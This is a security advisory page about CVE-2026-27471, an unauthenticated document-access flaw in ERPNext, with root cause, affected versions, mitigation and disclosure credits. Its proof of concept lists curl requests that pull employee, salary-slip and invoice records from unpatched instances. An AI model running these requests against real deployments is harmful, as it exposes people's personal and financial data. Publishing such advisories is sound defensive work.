← Back to Hall of Fame
CriticalCVSS 9.1Improper Access ControlCVE-2026-27471

Published February 2026

ERPNext Unauthorized Document Access via Missing Validation

BugBunny.ai discovered a critical access control vulnerability in ERPNext, a free and open source Enterprise Resource Planning tool. Certain endpoints lacked access validation, allowing unauthorized users to access sensitive business documents including employee records, financial data, and more.

Responsibly DisclosedView CVE →

TL;DR

Missing access validation on sensitive endpoints

Impact:Unauthorized access to sensitive business documents (employee records, financial data, invoices)
Vector:Network-accessible endpoints without authentication or authorization checks
Surface:All ERPNext deployments running versions <15.98.1 or <16.6.1
Status:Fixed in ERPNext 15.98.1 and 16.6.1

Root Cause

Certain API endpoints in ERPNext did not enforce access control checks before returning document data. The application failed to verify whether the requesting user had appropriate permissions (or was authenticated at all) before serving sensitive resources. This constitutes both a missing authentication (CWE-306) and missing authorization (CWE-862) vulnerability, falling under the broader category of improper access control (CWE-284).

The vulnerability affects ERPNext versions prior to 15.98.1 in the v15 branch and prior to 16.6.1 in the v16 branch. An attacker with network access to the ERPNext instance could retrieve documents containing confidential business information without any credentials.

Proof of Concept

# Unauthenticated document access via unvalidated endpoints
# ERPNext versions < 15.98.1 and < 16.6.1

# 1. Access sensitive documents without authentication or authorization
curl -i https://<target>/api/resource/Employee \
  -H "Accept: application/json"

# Response (200 OK — no authentication required):
{
  "data": [
    {
      "name": "HR-EMP-00001",
      "employee_name": "Jane Doe",
      "company_email": "jane@example.com",
      "date_of_birth": "1990-01-15",
      "salary_mode": "Bank",
      ...
    }
  ]
}

# 2. Access other sensitive document types
curl -i https://<target>/api/resource/Salary%20Slip \
  -H "Accept: application/json"

# 3. Access customer/supplier financial data
curl -i https://<target>/api/resource/Sales%20Invoice \
  -H "Accept: application/json"

# Result: Full read access to sensitive business documents
# including employee records, financial data, and more —
# without any authentication or authorization checks.

Weaknesses

CWE-284

Improper Access Control

CWE-306

Missing Authentication for Critical Function

CWE-862

Missing Authorization

Mitigation

  • Upgrade to ERPNext 15.98.1 or 16.6.1 immediately
  • No workaround is available — upgrading is the only remediation
  • Review access logs for unauthorized document access patterns

Credits & Disclosure

Reported by zaddy6 and responsibly disclosed to the ERPNext maintainers. Credit accepted by Arthur Gervais (BugBunny.ai). Published via GitHub Security Advisory GHSA-wpfx-jw7g-7f83.

Reporter: zaddy6Credit: Arthur GervaisCVE-2026-27471GHSA-wpfx-jw7g-7f83ERPNext
CVE-2026-27471: ERPNext Unauthorized Document Access | BugBunny.ai | BugBunny.ai